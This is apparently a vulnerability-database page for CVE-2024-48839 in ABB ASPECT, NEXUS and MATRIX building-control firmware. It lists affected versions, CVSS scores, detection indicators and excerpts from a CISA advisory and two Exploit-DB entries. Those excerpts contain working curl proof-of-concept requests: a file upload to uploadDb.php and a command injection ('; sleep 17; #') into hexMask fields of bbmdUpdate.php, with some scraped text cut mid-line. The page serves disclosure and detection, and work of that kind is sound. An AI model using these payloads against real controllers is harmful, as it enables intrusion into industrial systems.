CVE-2024-48839
published 2024-12-05CVE-2024-48839: Improper Input Validation vulnerability allows Remote Code Execution. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series…
PriorityP271critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.85%
85.1th percentile
Improper Input Validation vulnerability allows Remote Code Execution.
Affected products:
ABB ASPECT - Enterprise v3.08.02;
NEXUS Series v3.08.02;
MATRIX Series v3.08.02
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| abb | aspect-ent-12_firmware | < 3.08.03 | 3.08.03 |
| abb | aspect-ent-256_firmware | < 3.08.03 | 3.08.03 |
| abb | aspect-ent-2_firmware | < 3.08.03 | 3.08.03 |
| abb | aspect-ent-96_firmware | < 3.08.03 | 3.08.03 |
| abb | aspect-enterprise | <= 3.08.02 | — |
| abb | matrix-11_firmware | < 3.08.03 | 3.08.03 |
| abb | matrix-216_firmware | < 3.08.03 | 3.08.03 |
| abb | matrix-232_firmware | < 3.08.03 | 3.08.03 |
| abb | matrix-264_firmware | < 3.08.03 | 3.08.03 |
| abb | matrix-296_firmware | < 3.08.03 | 3.08.03 |
| abb | matrix_series | <= 3.08.02 | — |
| abb | nexus-2128-a_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-2128-f_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-2128-g_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-2128_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-264-a_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-264-f_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-264-g_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-264_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-3-2128_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus-3-264_firmware | < 3.08.03 | 3.08.03 |
| abb | nexus_series | <= 3.08.02 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP POST requests to uploadDb.php with multipart file uploads (userfile parameter) containing .db files — successful upload makes the file accessible under /database/ ↗
- →Detect shell metacharacter injection in POST parameters to bbmdUpdate.php — specifically semicolons and shell commands (e.g., sleep) embedded in hexMask or NAThexMask fields ↗
- →Alert on POST requests to bbmdUpdate.php containing both rowCount/rowCountNAT parameters alongside ip/port/hexMask fields with non-hex content (command injection pattern) ↗
- →Detect time-based blind command injection via anomalous response delays (≥17 seconds) on requests to bbmdUpdate.php ↗
- ·The PHPSESSID cookie value shown in exploit PoCs is a placeholder ('xxx') — a valid authenticated session token is required for exploitation, meaning the attacker must first obtain a session (e.g., via credential theft or another vulnerability) ↗
- ·Affected versions are explicitly limited to v3.08.02 across ASPECT-Enterprise, NEXUS Series, and MATRIX Series; detections should be scoped to these product lines ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r2qc-jxfv-v8w8: Improper Input Validation vulnerability allows Remote Code Execution
ghsa_unreviewed·2024-12-05
CVE-2024-48839 [CRITICAL] CWE-94 GHSA-r2qc-jxfv-v8w8: Improper Input Validation vulnerability allows Remote Code Execution
Improper Input Validation vulnerability allows Remote Code Execution.
Affected products:
ABB ASPECT - Enterprise v3.08.02;
NEXUS Series v3.08.02;
MATRIX Series v3.08.02
CISA ICS
ABB ASPECT-Enterprise, NEXUS, and MATRIX Series Products
cisa_ics·2025-01-07·CVSS 8.7
[HIGH] ABB ASPECT-Enterprise, NEXUS, and MATRIX Series Products
ICS Advisory
##
ABB ASPECT-Enterprise, NEXUS, and MATRIX Series Products
Release DateJanuary 07, 2025
Alert CodeICSA-25-007-01
Related topics:
Industrial Control System Vulnerabilities, Industrial Control Systems
View CSAF
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: ABB
- Equipment: ASPECT-Enterprise, NEXUS, and MATRIX series
- Vulnerabilities: Files or Directories Accessible to External Parties, Improper Validation of Specified Type of Input, Cleartext Transmission of Sensitive Information, Cross-site Scripting, Server-Side Request Forgery (SSRF), Improper Neutralization of Special Elements in Data Query Logic, Allocation of Resources Without Limits or Throttling, Weak Password Requirements, Cr
No detection rules found.
Exploit-DB
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
exploitdb·2025-04-15·CVSS 9.3
CVE-2024-48839 [CRITICAL] ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
---
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: -H "Cookie: PHPSESSID=xxx" \
> -F "[email protected]"
$ curl http://192.168.73.31/database/testingus.db
Exploit-DB
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
exploitdb·2025-04-15·CVSS 9.3
CVE-2024-6516 [CRITICAL] ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
---
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit
$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=Submit
No writeups or analysis indexed.
2024-12-05
Published